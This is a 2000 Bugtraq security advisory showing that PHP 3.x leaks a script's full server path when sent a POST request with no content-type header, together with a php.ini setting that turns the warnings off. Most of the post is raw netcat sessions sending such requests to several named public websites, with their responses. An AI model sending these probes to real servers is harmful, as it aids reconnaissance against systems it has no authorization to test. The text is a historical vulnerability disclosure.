Date: Thu, 15 Jun 2000 17:21:59 -0500 From: H D Moore <hdm@SECUREAUSTIN.COM> Subject: PHP 3.0.14 Disclosure via POST requests To: BUGTRAQ@SECURITYFOCUS.COM Hi, I noticed some not-so-good behavior in PHP 3.0.14 when dealing with POST requests that do not contain a content-type header in the request (illegal). The server will return the page anyways, but the first line will be a PHP warning message containing the full path to that file. The PHP developers have _not_ been notified because the bug (?) only appears in older versions of thier software (4.0 has been released) and the fact that path disclosure is a weak vulnerability by itself. The only reason I bothered posting this is becase of the inordinate amount of interest on Bugtraq about NT's IIS giving away the pathnames to scripts. Disabling PHP's warning messages can be done by changing the line in php.ini reading: display_errors = On ; Print out errors (as a part of the HTML script) to: display_errors = Off ; Print out errors (as a part of the HTML script) and restarting the webserver. -HD http://www.secureaustin.com http://www.digitaldefense.net Below are the results of my testing: ---[ PHP 3.0.14 hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.secureaustin.com 80 POST /index.php3 HTTP/1.0 Host: www.secureaustin.com HTTP/1.1 200 OK Date: Thu, 15 Jun 2000 22:06:13 GMT Server: Apache/1.3.11 (Unix) PHP/3.0.14 mod_ssl/2.5.0 OpenSSL/0.9.4 X-Powered-By: PHP/3.0.14 Connection: close Content-Type: text/html <br> <b>Warning</b>: POST Error: content-type missing in <b>/home/www/htdocs/secureaustin/index.php3</b> on line <b>1 ---[ PHP 3.0.9 hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.worldcupadvisor.com 80 POST /Main_Menu/body_main_menu.php3 HTTP/1.0 Host: www.worldcupadvisor.com HTTP/1.1 200 OK Date: Thu, 15 Jun 2000 22:01:40 GMT Server: Apache/1.3.3 (Unix) PHP/3.0.9 FrontPage/3.0.4.3 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> [ snip ] hdm@atrophy:/var/www/htdocs/secureaustin > ---[ PHP 4.0B2 hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.stonekeep.com 80 POST /ksonline/visitor.php3 HTTP/1.0 Host: www.stonekeep.com HTTP/1.1 200 OK Date: Thu, 15 Jun 2000 21:57:11 GMT Server: Apache/1.3.9 (Unix) PHP/4.0B2 Connection: close Content-Type: text/html <br> <b>Fatal error</b>: No content-type in POST request in <b>[no active file]</b> on line <b>0</b><br> hdm@atrophy:/var/www/htdocs/secureaustin > ---[ PHP 4.0 hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.freshmeat.net 80 POST / HTTP/1.0 Host: www.freshmeat.net HTTP/1.1 200 OK Date: Thu, 15 Jun 2000 21:48:59 GMT Server: Apache/1.3.12 (Unix) PHP/4.0.0 Connection: close Content-Type: text/html <br> <b>Fatal error</b>: No content-type in POST request in <b>Unknown</b> on line <b>0</b><br> hdm@atrophy:/var/www/htdocs/secureaustin > ---[ PHP 4.0.1-dev hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.php.net 80 POST /quickref.php HTTP/1.0 Host: www.php.net hdm@atrophy:/var/www/htdocs/secureaustin > ^-- just disconnects